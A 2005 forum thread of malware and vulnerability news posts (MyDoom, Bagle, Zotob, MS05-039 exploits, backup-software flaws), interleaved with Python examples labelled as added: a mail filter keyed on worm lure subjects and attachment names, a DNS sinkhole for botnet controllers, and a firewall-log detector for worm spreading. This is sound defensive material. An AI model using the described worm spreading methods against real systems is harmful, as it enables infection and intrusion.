All of these programs are designed to download adware onto the victim machine. So it seems likely that whoever created the original dropper didn’t know that the machine he used was infected with Parite. On the other hand, it could just be another attempt on the part of virus writers to prevent their creations being detected by dedicated anti-adware and anti-spyware solutions, which can’t detect standard file viruses.
-
July 29, 2005 at 5:23 pm #3182402
Malek Tips – Spyware and Adware Info and Removal Tips
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
This site has a number of “free for personal use” and “trial versions” of spyware.
-
July 29, 2005 at 5:23 pm #3182403
Windows Vista – An in-depth review by PC Magazine
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
PC Magazine provides an in-depth report on the first beta of Windows Vista
http://www.pcmag.com/article2/0,1895,1840816,00.asp
WHAT’S TO COME… 2006
[2005]
July 27: Vista beta 1 ships
Mid-September: Beta 1 Refresh at Microsoft
Professional Developers Conference
[2006]
First half: Vista beta 2
Q2/Q3: Vista release to manufacturing
Holiday season: Vista retail release
Table of contents: Hands On with the Next Windows • Introduction • Vista’s New Look • Performance and Reliability • Deployment and Management • Vista as a Platform • Coulda, Woulda, Shoulda • Glossary: The Long and Short of It • Windows Security: This Time for Sure! • The Beta Program • Internet Explorer 7
-
July 30, 2005 at 9:20 pm #3182162
NIST: Minimum Security Requirements for Federal Information Systems
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
NIST has developed a report on minimum security requirements for federal information systems. This planning study might be valuable for companies to look at for ways and priorities associated with strengthening their security during the coming year.
NIST: Minimum Security Requirements for Federal Information Systems
-
July 31, 2005 at 5:20 am #3182113
Cisco Security Advisory 65783: IPv6 Crafted Packet Vulnerability
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
CERT: CISCO IPv6 vulnerability VU#930892
Cisco Systems devices running IOS that are configured to handle Internet Protocol version 6 (IPv6) traffic may not properly handle a specially-crafted packet sent from the local network segment. This improper packet handling may result in a denial-of-service condition or in the execution of arbitrary code on the device running IOS.
The specific nature of the crafted packets exploiting this vulnerability is not known.
Only devices configured to handle IPv6 traffic are vulnerable to this flaw. Any logical or physical interface that handles the crafted packet is vulnerable to the flaw. In addition, the attacker must send the crafted packet on the local network segment. Packets sent one or more hops away from the device will not affect the vulnerable device in a negative manner.
For details on fixes, updates, and workarounds, please see
Cisco Security Advisory 65783: IPv6 Crafted Packet Vulnerability.
-
August 2, 2005 at 5:20 pm #3196302
MyDoom.CH – New Variant (appears to be from email administrator)
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
All new MyDoom variants should be carefully watched. These email messages appear to be official email administrator warnings that should be deleted and not opened.
MyDoom.CH – New Variant (appears to be from email administrator)
Subject:
Your password has been updated
Your password has been successfully updated
You have successfully updated your password
Your new account password is approved
Your Account is Suspended
*DETECTED* Online User Violation
Your Account is Suspended For Security Reasons
Warning Message: Your services near to be closed.
Important Notification
Members Support
Security measures
Email Account Suspension
Notice of account limitation
Attachment Name:
updated-password
email-password
new-password
password
approved-password
account-password
accepted-password
important-details
account-details
email-details
account-info
document
readme
account-report
Extension Suffix on Attachment:
.pif
.scr
.exe
.cmd
.bat
TCP/IP BACKDOOR:
Opens a back door by connecting to an IRC server running on a hostile domain on TCP port 6667.
-
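A mail-gateway heuristic built from the subject lines, attachment names and executable suffixes listed in the post above. This is an added example, not code from the original post or from any AV vendor; the sample messages are constructed.

```python
"""Heuristic mail filter for the MyDoom.CH lure pattern described above.

Added example, not from the original post or from any vendor tool. The subject
lines, attachment base names and extensions come from the post; the sample
messages are constructed for illustration.
"""

# Subjects the post lists (compared case-insensitively).
MYDOOM_SUBJECTS = {
    "your password has been updated",
    "your password has been successfully updated",
    "you have successfully updated your password",
    "your new account password is approved",
    "your account is suspended",
    "*detected* online user violation",
    "your account is suspended for security reasons",
    "warning message: your services near to be closed.",
    "important notification",
    "members support",
    "security measures",
    "email account suspension",
    "notice of account limitation",
}

# Attachment base names and executable suffixes the post lists.
MYDOOM_ATTACHMENT_NAMES = {
    "updated-password", "email-password", "new-password", "password",
    "approved-password", "account-password", "accepted-password",
    "important-details", "account-details", "email-details", "account-info",
    "document", "readme", "account-report",
}
EXECUTABLE_SUFFIXES = {".pif", ".scr", ".exe", ".cmd", ".bat"}


def split_attachment(filename):
    """Return (first name component, final suffix) in lower case.

    Using the *final* suffix means a double extension such as
    'readme.txt.scr' is still recognised as a screensaver executable.
    """
    name = filename.strip().lower()
    parts = name.split(".")
    if len(parts) == 1:
        return name, ""
    return parts[0], "." + parts[-1]


def classify(message):
    """Classify one message given as {'subject': str, 'attachments': [str]}.

    Returns (verdict, reasons):
      'quarantine' - lure subject AND an executable attachment (the worm pattern)
      'suspicious' - only one indicator present; variants rotate subject lines,
                     so an executable attachment alone still warrants review
      'clean'      - neither indicator
    """
    reasons = []
    subject_hit = message.get("subject", "").strip().lower() in MYDOOM_SUBJECTS
    if subject_hit:
        reasons.append("subject matches MyDoom.CH lure list")

    executable_hits = []
    for filename in message.get("attachments", []):
        base, suffix = split_attachment(filename)
        if suffix in EXECUTABLE_SUFFIXES:
            executable_hits.append(filename)
            if base in MYDOOM_ATTACHMENT_NAMES:
                reasons.append(f"attachment {filename!r} uses a known worm name and suffix")
            else:
                reasons.append(f"attachment {filename!r} is an executable type ({suffix})")

    if subject_hit and executable_hits:
        return "quarantine", reasons
    if subject_hit or executable_hits:
        return "suspicious", reasons
    return "clean", reasons


# Constructed sample traffic: one worm message, one benign, two borderline.
SAMPLE_MESSAGES = [
    {"subject": "Your Account is Suspended", "attachments": ["account-details.pif"]},
    {"subject": "Re: lunch on Friday", "attachments": ["agenda.doc"]},
    {"subject": "Quarterly figures", "attachments": ["readme.txt.scr"]},
    {"subject": "Important Notification", "attachments": []},
]


def scan(messages):
    """Return the verdict for each message, in order."""
    return [classify(m)[0] for m in messages]


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        verdict, reasons = classify(msg)
        print(f"{verdict:11} {msg['subject']!r}: {'; '.join(reasons) or 'no indicators'}")
```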
August 3, 2005 at 9:20 am #3051709
MS04-028: “Never say Never” (JPEG risks could increase)
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
For years, we all thought JPEGs were safe until MS04-028 taught us to “Never say Never” as one of my favorite weblogs shares in the August 2nd commentary.
A recent MS04-028 attack (i.e., a downloader for Backdoor.Win32.Haxdoor.dw) wasn’t properly tested by the virus writers and didn’t work properly. However, as Kaspersky analysts noted, easy modifications could make JPEGs a more substantial risk, esp. on unpatched PCs.
It definitely pays to be patched up on MS security updates, AV protection, and the latest Firewall software.
Kaspersky Weblog: Never say Never (JPEG risks) – Aug 2, 2005
http://www.viruslist.com/en/weblog
-
August 4, 2005 at 9:20 am #3051221
Windows Vista – First Proof-of-Concept MSH based Virus
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
These MSH based proof-of-concept viruses depend on whether the Monad shell interface will be ultimately included with Vista. Most likely the MSH environment will be further secured as Microsoft progresses in the beta testing process.
F-Secure Weblog: Windows Vista – 1st Proof-of-Concept MSH based Virus
F-Secure: Danom MSH based POC virus description
QUOTE: An Austrian virus writer has published five simple viruses targeting Microsoft MSH in a virus writing magazine. MSH, or Microsoft Command Shell, is a command line interface and scripting language. It’s basically a replacement for shells such as CMD.EXE, COMMAND.COM or 4NT.EXE and will ship in 2006. As a command-line front end, MSH resembles many Unix shells quite a bit.
As MSH (codenamed ‘Monad’) was scheduled to ship as the default shell for Windows Vista (which went to first beta last week), you could argue that these are the first viruses for Windows Vista. However, it has lately been rumoured that MSH might not ship with Vista at all – instead might be part of Microsoft Exchange 2006 or something. We won’t know for sure until later.
-
August 5, 2005 at 12:29 pm #3051971
Core flaw opens Windows 2000 to attack
by harry waldron, cpcu, ccp · about 18 years, 8 months ago
In reply to Harry Waldron
Core flaw opens Windows 2000 to attack
A serious flaw has been discovered in a core component of Windows 2000, with no possible work-around until it gets fixed, a security company said. The vulnerability in Microsoft’s operating system could enable remote intruders to enter a PC via its IP address, Marc Maiffret, chief hacking officer at eEye Digital Security, said on Wednesday. As no action on the part of the computer user is required, the flaw could easily be exploited to create a worm attack, he noted.
What may be particularly problematic with this unpatched security hole is that a work-around is unlikely, he said. “You can’t turn this [vulnerable] component off,” Maiffret said. “It’s always on. You can’t disable it. You can’t uninstall.”
-
August 6, 2005 at 8:29 am #3052451
Windows Vista – More secure than reported to combat 1st “virus”
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Lee Holmes works on the team building the Vista Monad scripting environment. In his blog, he shares a great response on the new Danom “virus” variants (5 so far) designed to interact with the new Vista Monad environment.
This is a good read as it is chock-full of great security points (e.g., think before you click, use non-admin accounts, don’t use out-of-the-box security defaults, etc.).
Lee Holmes Blog – Monad and the “First Vista Virus”
Windows Vista – First Proof-of-Concept MSH based Virus
QUOTES:
It’s a misleading title, as it’s an issue that affects any vehicle for any executable code on any operating system.
To protect yourself against the point of entry, follow the guidance suggested by Microsoft’s Malware FAQ: The best way to stop viruses is to use common sense. If an executable computer program is attached to your e-mail and you are unsure of the source, then it should be deleted immediately. Do not download any applications or executable files from unknown sources, and be careful when trading files with other users.
To limit the amount of damage that the malicious code can do, try to limit the amount of time you run as Administrator / root.
To combat this, Monad has three features to help: not installing a shell association by default, configurable execution policies (along with digitally signing scripts,) and not running scripts from the current directory.
As for not running scripts in the current directory, Monad follows a policy similar to that of Unix shells: we do not run them, unless you explicitly ask us to.
-
August 6, 2005 at 8:29 am #3052452
CERT: Vulnerability in CA BrightStor ARCserve Backup Agents
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
US-CERT is reporting vulnerabilities, public exploits, and increased scans on port 6070 associated with the CA BrightStor ARCserve Backup Agents. Please quickly perform security updates if you use this product.
Computer Associates Advisory and Security Patch Information
US-CERT Advisory – Vulnerability in CA BrightStor ARCserve Backup Agents
US-CERT Advisory – Increased Scanning in Port 6070 used by CA BrightStor ARCserve Backup Agents
QUOTE: Computer Associates BrightStor ARCserve Backup system contains a buffer overflow vulnerability that may allow remote attackers to execute arbitrary code or cause a denial of service condition. The vulnerability exists in several BrightStor ARCserve Backup Agents, such as BrightStor ARCserve Backup Agent for Microsoft SQL server, and is due to improper bounds checking performed on data sent to ports 6070 and 6050. Remote attackers can exploit this vulnerability to either crash the agent or to overflow the buffer and execute arbitrary code with SYSTEM privileges.
-
August 7, 2005 at 4:29 am #3052330
SANS – Malicious URL Inventory Project
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Just like we should never click on attachments, the same principle goes for untrusted URLs. SANS is building an inventory site of these through their new submission site, allowing contributions from the general public. This might be a valuable future research tool, as I favor shutting hostile sites down.
-
August 9, 2005 at 4:29 am #3050760
ISC – Protecting your corporate assets and network
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
While the primary focus of network protection is on botnets, these tips are essential best practices to ensure the privacy and confidentiality of corporate information are protected.
ISC – Protecting your corporate assets and network
Centralize network egress — If you haven’t already consolidated your access to the Internet, fighting the botnet fight will be that much harder if your networks have many paths to the public Internet at large.
Employ Egress filtering — Block everything going out to the world that is unnecessary for business. Policies are a good candidate for a new bullet point, so if you don’t have them currently in place, develop them. Do you connect to windows fileshares on the net? Block outbound access. Do you tftp gets and puts to the net? Block outbound access. Better yet, start from scratch and block everything. Establish your minimum outbound networking requirements, allow just that, and require all new connectivity to navigate an access request process. Force web traffic through restrictive proxy servers; arbitrary outbound TCP port 80 and 443 is a nightmare waiting to happen, or maybe just waiting for you to discover.
Centralize your logging — Without easy access to logging from Firewalls, VPN concentrators and other network devices finding the threat from within becomes unnecessarily complicated.
Deploy Intrusion Sensors — Finding the traditional IRC based botnet with intrusion sensor technology is easy and unending fun. Really. Unending fun. HTTP and UDP based bots get a bit trickier but are not impossible to detect
DNS – Blackholes, Poisoning and Reporting — If you have control of your DNS infrastructure you can protect your networks by intentionally poisoning “your” internal resolvers. You can establish zone files for known malicious botnet controller hostnames that would effectively prevent botnet herding miscreants from gaining control of any botted hosts on your network through the update of DNS records which could evade your null route on any previously known botnet controller
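The DNS blackhole tip above, worked through as an added example (not from the ISC post or any real resolver): a zone-level override catches every name under a known controller zone, so the herder updating an A record cannot slip past an IP null route, and the resolver records which internal clients asked. The controller names use the reserved .invalid TLD as placeholders; the sinkhole address and upstream answers are constructed.

```python
"""DNS blackholing with reporting, as the ISC tip above describes: answer known
botnet-controller names from a local zone so an updated A record at the herder's
end cannot route around a null route, and log which internal hosts asked.

Added example, not from the original post or from ISC. The controller names are
placeholders (.invalid TLD); the sinkhole address and upstream answers are
constructed.
"""
from collections import defaultdict

SINKHOLE_IP = "10.255.255.1"     # constructed internal sinkhole address

# Placeholder controller zones; in practice these come from your own intel feeds.
BLACKHOLE_ZONES = {
    "controller.example.invalid",
    "irc.botnet-c2.example.invalid",
}

# Constructed upstream answers standing in for normal recursive resolution.
UPSTREAM_ANSWERS = {
    "www.example.invalid": "192.0.2.10",
    "mail.example.invalid": "192.0.2.25",
}


def normalize(qname):
    """DNS names are case-insensitive and may carry a trailing dot."""
    return qname.rstrip(".").lower()


class SinkholingResolver:
    """Internal resolver that overrides whole zones, not single hostnames,
    so 'update3.controller.example.invalid' is caught along with the apex."""

    def __init__(self, zones, sinkhole_ip, upstream):
        self.zones = {normalize(z) for z in zones}
        self.sinkhole_ip = sinkhole_ip
        self.upstream = upstream                      # dict: name -> answer
        self.hits = defaultdict(set)                  # zone -> clients that asked

    def matching_zone(self, qname):
        """Return the blackholed zone that covers qname, or None."""
        labels = normalize(qname).split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            if candidate in self.zones:
                return candidate
        return None

    def resolve(self, client_ip, qname):
        """Answer a query: sinkhole if blackholed (recording the client), else upstream."""
        zone = self.matching_zone(qname)
        if zone is not None:
            self.hits[zone].add(client_ip)
            return self.sinkhole_ip
        return self.upstream.get(normalize(qname))    # None models NXDOMAIN

    def report(self):
        """Hosts that looked up controller names: candidates for cleanup."""
        return {zone: sorted(clients) for zone, clients in self.hits.items()}


def run_constructed_queries():
    """Replay constructed queries and return (answers, report)."""
    resolver = SinkholingResolver(BLACKHOLE_ZONES, SINKHOLE_IP, UPSTREAM_ANSWERS)
    queries = [
        ("10.0.1.20", "update3.controller.example.invalid."),   # subdomain, trailing dot
        ("10.0.1.20", "CONTROLLER.example.invalid"),            # case differs
        ("10.0.1.21", "www.example.invalid"),                   # legitimate lookup
        ("10.0.1.22", "irc.botnet-c2.example.invalid"),         # zone apex
        ("10.0.1.23", "notcontroller.example.invalid"),         # no suffix match
    ]
    answers = [resolver.resolve(client, name) for client, name in queries]
    return answers, resolver.report()


if __name__ == "__main__":
    answers, report = run_constructed_queries()
    print("answers:", answers)
    for zone, clients in report.items():
        print(f"{zone}: queried by {', '.join(clients)}")
```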
-
August 9, 2005 at 12:29 pm #3052599
Microsoft Security Bulletins – August 2005
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Microsoft Security Bulletins – August 2005
CRITICAL: Cumulative Security Update for Internet Explorer (896727)
CRITICAL: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (896423)
IMPORTANT: Vulnerability in Telephony Service Could Allow Remote Code Execution (893756)
MODERATE: Vulnerability in Remote Desktop Protocol Could Allow Denial of Service (899591)
RELEASED: Vulnerabilities in Microsoft Word May Lead to Remote Code Execution (890169)
RELEASED: Vulnerability in Microsoft Agent Could Allow Spoofing (890046)
-
August 9, 2005 at 8:29 pm #3052477
Internet Storm Center – Analysis of Microsoft August 2005 Security Updates
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The Internet Storm Center provides a comprehensive analysis of Microsoft Security Updates each month. This update should be installed as soon as possible, as some vulnerabilities could be reverse engineered into exploits.
Internet Storm Center – Analysis of Microsoft August 2005 Security Updates
-
August 10, 2005 at 3:49 pm #3052817
Microsoft Update – New Windows/Office Consolidated Updates
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The new Microsoft Update provides for all Windows, Office, and other Microsoft based updates to be managed through a single update facility.
Select the link below to try this new facility:
Microsoft Update offers you everything you get through Windows Update, plus updates for Office and other Microsoft applications, all in one place. The Automatic Update feature is included in Microsoft Update so there is no more guesswork. Keep your computer more secure, up-to-date, and performing at its best with Microsoft Update
-
August 11, 2005 at 11:49 am #3048119
MS05-038 & MS05-041 — Proof of Concept Exploits developed
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Below are brand new Proof of Concept exploits from the August 2005 updates. These were reverse engineered during the first day security patches for MS05-038 and MS05-041 were published by Microsoft.
-
August 11, 2005 at 7:49 pm #3049298
Veritas Backup – Zero day exploit in wild
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
QUOTE: FrSIRT has released an advisory containing what they call “Veritas Backup Exec Windows Agent Remote File Access Exploit (0day)” The ISC has already seen an increase in scans for port 10000, and advise any users of Backup Exec deny access to that port from all untrusted networks.
ISC Veritas Backup – Zero day exploit in wild
FRSIRT – BackupExec Exploit
FRSIRT – Veritas Backup – Zero day Advisory
Key Safeguard: Restrict access to port 10000.
-
August 11, 2005 at 7:49 pm #3049297
MS05-039 Exploit Developed
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
-
August 12, 2005 at 7:49 am #3049137
Bagle.CF – New variant uses “Taxes” theme (medium risk at F-Secure)
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
As noted in F-Secure’s weblog below, the author of the Bagle virus family has been active in the past week or so. This new variant uses a theme of “increases in taxes” in its social engineering approach. F-Secure ranks this as 2 of 3 (Medium Risk).
F-Secure – Bagle.CF Information
Computer Associates – Bagle.BQ
Symantec – Beagle.CE Description
F-Secure Log (Aug 12): Two certain things in life: Bagle and taxes
Kaspersky Log (Aug 11): Bagle Author back from vacation
Another new Bagle variant – Bagle.CF – has been found on August 11th, 2005. This variant is very similar to the previous variant, Bagle.BY. Bagle.CF comes inside a RAR archive containing the file ‘Taxes.exe’. The name of the RAR archive can vary, but is somehow tax-related, for example ‘Increase_in_the_tax.rar’. Instead of a picture icon, Bagle.CF uses a text file icon.
E-mail Format
From: <spoofed>
Subject: Blank
Message Body: Blank
The Attachment name is selected from the following list:
Taxes.zip
The_taxation.zip
The_reporting_of_taxes.zip
Work and taxes.zip
Increase_in_the_tax.zip
To_reduce_the_tax.zip
The ZIP attachment contains: Taxes.exe
-
August 12, 2005 at 7:49 am #3049138
Microsoft August 2005 Security Bulletins — FrSirt reports 5 New Exploits already
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
At least five separate exploits have been developed so far. In particular the MS05-039 exploits could represent serious threats and everyone is urged to update their systems to the latest levels of protection as soon as possible.
2005-08-11 : Microsoft Windows Plug and Play Remote Buffer Overflow Exploit (MS05-039)
2005-08-11 : Microsoft Windows 2000 Plug and Play Universal Remote Exploit (MS05-039)
2005-08-11 : Microsoft Internet Explorer COM Objects File Download Exploit (MS05-038)
2005-08-09 : Microsoft Internet Explorer COM Objects Instantiation Exploit (MS05-038)
2005-08-09 : Microsoft Windows Remote Desktop Protocol DoS Exploit (MS05-041)
-
August 12, 2005 at 7:49 am #3049139
McAfee ePO Local Privilege Escalation Vulnerability
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
This impacts corporate users, and so far there are no reports of any exploits in the wild.
McAfee ePO Local Privilege Escalation Vulnerability
http://www.frsirt.com/english/advisories/2005/1402
A vulnerability was identified in McAfee ePolicy Orchestrator, which may be exploited by local attackers to obtain elevated privileges. This flaw is due to an access validation error where the default document root directory for the ePolicy Orchestrator Agent Web server is installed with “Everyone/Full Control” privileges, which could be exploited by local attackers to create directory symbolic links and gain SYSTEM access, via the ePolicy Orchestrator Agent Web server, to the contents of arbitrary files and directories located in the same partition as the affected directory.
-
August 13, 2005 at 7:49 am #3047444
Internet Storm Center – Moves to Yellow alert status
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The ISC is promoting awareness and the need to quickly patch up, by moving to the rare yellow condition. The Bagle attacks, the Veritas zero day exploit, and at least six August Windows exploits are signs we are indeed in an ACTIVE cycle.
Internet Storm Center – Moves to Yellow alert status
QUOTE: Infocon: Yellow — Due to a number of very well working Windows exploits for this week’s patch set, and the zero-day Veritas exploit, we decided to turn the infocon to yellow.
Advice: Use the weekend to patch ALL WINDOWS SYSTEMS. It may be worthwhile to consider accelerated deployment of the patches even to critical systems if the weekend is slow anyway. Backup Exec should be firewalled or disabled at this point.
Note: Consider unprotected internet facing machines infected at this point if they do not have this week’s patches applied. Patch and handle them with extra care.
We are currently tracking a significant new threat. The impact is either unknown or expected to be minor to the infrastructure. However, local impact could be significant. Users are advised to take immediate specific action to contain the impact. Example: ‘MSBlaster’ worm outbreak.
-
August 14, 2005 at 7:49 am #3048641
MS05-039: Zotob.A Internet Worm — In-the-wild
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The Mytob worm has been modified to include MS05-039 exploitation. F-Secure gives this a MEDIUM RISK rating (2 of 3 on the Radar scale).
KEY LINKS
MS05-039: Zotob.A Worm – F-Secure (MEDIUM RISK)
MS05-039: Zotob.A Worm – F-Secure WEBLOG
MS05-039: Zotob.A Worm – F-Secure (MEDIUM RISK)
Zotob.A is a Mytob clone that spreads using a vulnerability in Windows Plug and Play service (MS05-039).
Spreading using Plug and Play service vulnerability
The worm scans for systems vulnerable to Microsoft Windows Plug and Play service (MS05-039) through TCP/445. If the attack is successful, the worm instructs the remote computer to download and execute the worm from the attacker computer using FTP. The FTP server listens on port 33333 on all infected computers with the purpose of serving out the worm for other hosts that are being infected. The downloaded file is saved as ‘haha.exe’ on disk.
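The spreading behaviour described above (a TCP/445 sweep, then the victim pulling the worm back over FTP from the attacker's port 33333 listener) gives a defender two log-side signals. This added example, not from the post or from F-Secure, scores constructed firewall log lines for both; the log format, addresses and the distinct-target threshold are assumptions.

```python
"""Spot Zotob.A-style spreading in firewall logs: one host probing TCP/445 on
many neighbours, then victims pulling the worm back from the attacker's FTP
listener on TCP/33333 (the behaviour the post describes).

Added example, not from the original post or from any vendor tool. The log
format, addresses and thresholds are constructed assumptions.
"""
import re
from collections import defaultdict

WORM_FTP_PORT = 33333          # listener the post describes on infected hosts
SMB_PORT = 445                 # MS05-039 exploitation path
SCAN_DISTINCT_TARGETS = 8      # assumed: this many distinct 445 targets = scanning

# Assumed line format: "<date> <time> <ALLOW|DROP> <TCP|UDP> <src> <dst> <dport>"
LINE_RE = re.compile(
    r"^(?P<date>\S+)\s+(?P<time>\S+)\s+(?P<action>ALLOW|DROP)\s+(?P<proto>TCP|UDP)\s+"
    r"(?P<src>[\d.]+)\s+(?P<dst>[\d.]+)\s+(?P<dport>\d+)\s*$"
)


def parse_events(lines):
    """Yield parsed events; silently skip lines that do not match the format."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["dport"] = int(ev["dport"])
            yield ev


def analyze(lines):
    """Return {'scanners', 'worm_ftp_servers', 'likely_new_victims'} as sorted lists.

    - scanners: sources touching TCP/445 on >= SCAN_DISTINCT_TARGETS distinct hosts
      (dropped attempts count too; the probe itself is the signal)
    - worm_ftp_servers: destinations that accepted a TCP/33333 connection, i.e.
      already-infected hosts serving the worm
    - likely_new_victims: sources of those TCP/33333 connections
    """
    smb_targets = defaultdict(set)
    ftp_servers, new_victims = set(), set()
    for ev in parse_events(lines):
        if ev["proto"] != "TCP":
            continue
        if ev["dport"] == SMB_PORT:
            smb_targets[ev["src"]].add(ev["dst"])
        elif ev["dport"] == WORM_FTP_PORT and ev["action"] == "ALLOW":
            ftp_servers.add(ev["dst"])
            new_victims.add(ev["src"])
    scanners = [src for src, dsts in smb_targets.items() if len(dsts) >= SCAN_DISTINCT_TARGETS]
    return {
        "scanners": sorted(scanners),
        "worm_ftp_servers": sorted(ftp_servers),
        "likely_new_victims": sorted(new_victims),
    }


def constructed_log():
    """Constructed sample: 10.0.1.20 sweeps a subnet on 445, gets one hit, and the
    victim fetches the worm from it; 10.0.3.7 is ordinary file-share traffic."""
    lines = [f"2005-08-14 09:00:01 DROP  TCP 10.0.1.20 10.0.2.{i} 445" for i in range(1, 12)]
    lines += [
        "2005-08-14 09:00:02 ALLOW TCP 10.0.1.20 10.0.2.12 445",
        "2005-08-14 09:00:03 ALLOW TCP 10.0.2.12 10.0.1.20 33333",
        "2005-08-14 09:05:00 ALLOW TCP 10.0.3.7 10.0.3.8 445",
        "2005-08-14 09:05:01 ALLOW TCP 10.0.3.7 10.0.9.9 443",
        "2005-08-14 09:05:02 ALLOW UDP 10.0.3.7 10.0.0.1 53",
        "malformed line that the parser should ignore",
    ]
    return lines


if __name__ == "__main__":
    for key, hosts in analyze(constructed_log()).items():
        print(f"{key}: {', '.join(hosts) or '-'}")
```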
-
August 14, 2005 at 7:49 pm #3048567
Zotob.B – New Variant (minor differences from “A” version)
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A new “B” variant has been developed and other new derivations are most likely on the way. Applying the latest Microsoft updates provides complete protection, as AV vendors could have difficulty keeping up.
Zotob.B – New Variant (minor differences from “A” version)
W32.Zotob.B is a worm that spreads using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 14, 2005 at 7:49 pm #3048566
MS05-039: New Spybot Variants are also using new exploit
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The same MS05-039 exploit code has been found in at least two Spybot variants in addition to the two new Zotob variants launched today.
MS05-039: New Spybot Variants are also using new exploit
McAfee information on two new Spybot variants
W32.Spybot.UBH is a worm that has distributed denial of service and back door capabilities. The worm spreads by using the vulnerability in Microsoft Windows Plug and Play Service (as described in Microsoft Security Bulletin MS05-039).
-
August 15, 2005 at 7:49 pm #3050135
MS05-039: eEye’s Free Retina UMPNP Scanner to find vulnerable computers
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
eEye’s Free Retina UMPNP Scanner – limited to 16 IP addresses
Retina UMPNP Scanner – The Retina UMPNP Scanner is a single audit scanning tool offered free of charge by eEye Digital Security. This tool will scan up to 16 IP addresses at once to determine if any are vulnerable to the Plug and Play Service vulnerability (MS05-039) released by Microsoft in August, 2005.
-
August 15, 2005 at 7:49 pm #3050136
MS05-039: FREE REMOVAL TOOL for Zotob Internet worm – Symantec
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
-
August 16, 2005 at 8:54 pm #3049952
MS05-039: Zotob D variant – MEDIUM RISK at Trend & Secunia
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The malware writers are unfortunately making improvements in the mechanisms to spread MS05-039 exploits, as Zotob “D” just went MEDIUM RISK.
MS05-039: Zotob “D” variant – MEDIUM RISK at Trend & Secunia
http://secunia.com/virus_information/20725/zotob.d/
-
August 16, 2005 at 8:54 pm #3049953
MS05-039: IRCBot HIGH RISK alert
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
http://vil.mcafeesecurity.com/vil/content/v_135491.htm
This detection is for an Internet Relay Chat (IRC) bot worm which includes the ability to spread by exploiting systems which are not yet patched for the MS05-039 vulnerability.
This worm is designed to contact a remote IRC server and wait for further instructions.
If you think that you may be infected with W32/IRCbot.worm!MS05-039, and are unsure how to check your system, you may download the Stinger tool to scan your system and remove the virus if present. This is not required for McAfee users as McAfee products are capable of detecting and removing the virus with the latest update. (See the removal instructions below for more information.)
-
August 16, 2005 at 8:54 pm #3049950
CNN: Zotob Worm strikes down Windows 2000 systems
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
CNN: Zotob Worm strikes down Windows 2000 systems
WASHINGTON (CNN) — A fast-moving computer worm Tuesday attacked computer systems using Microsoft operating systems, shutting down computers in the United States, Germany and Asia. Among those hit were offices on Capitol Hill, which is in the midst of August recess, and media organizations, including CNN, ABC and The New York Times. The Caterpillar Co. in Peoria, Illinois, reportedly also had problems.
-
August 17, 2005 at 12:54 pm #3048953
MS05-039 Cleaning infections for Windows 2000 PCs
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Below are the recommended general cleaning techniques for MS05-039 infections associated with the Windows 2000 environment. The key steps are to remove the current virus with a standalone removal tool, get Windows 2000 to Service Pack 4, and then apply the MS05-039 patch so you system is bullet-proof from current and future infections based on this specific security exposure.
1. IF NEEDED: Download Windows 2000 Service Pack 4 plus the MS04-011 patch. (this step can be skipped if user has these)
2. Download MS05-039 patch from Microsoft
3. Download McAfee’s Stinger standalone cleaning tool (which handles all major Zotob and other MS05-039 threats). Other AV and MS based standalone cleaners can be used also.
note – in steps 1-3, you may need to use another uninfected PC if they have the continuous reboot issue; also AV and Firewall protection may be gone as these worms clobber most of the popular ones. You can copy to and from a CD or USB memory stick to capture these repair tools. Stinger should fit on a diskette
4. Run McAfee’s Stinger cleaning tool (or other standalone AV or MS cleaning tools) to remove worm infection
5. IF NEEDED: Apply Windows 2000 SP4 and then reboot. Then apply the MS04-011 which provides protection against Sasser.
6. Apply the MS05-039 patch from Microsoft and reboot
7. Connect back to the Internet and run Windows Update Then update your Antivirus software. Update or add a firewall system if you need one.
8. From a lessons learned standpoint – always check at least once per month on every 2nd Tuesday for MS updates and apply them right away
-
August 19, 2005 at 12:54 pm #3066453
Internet Explorer – MSDDS Zero Day Exploit Protection
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
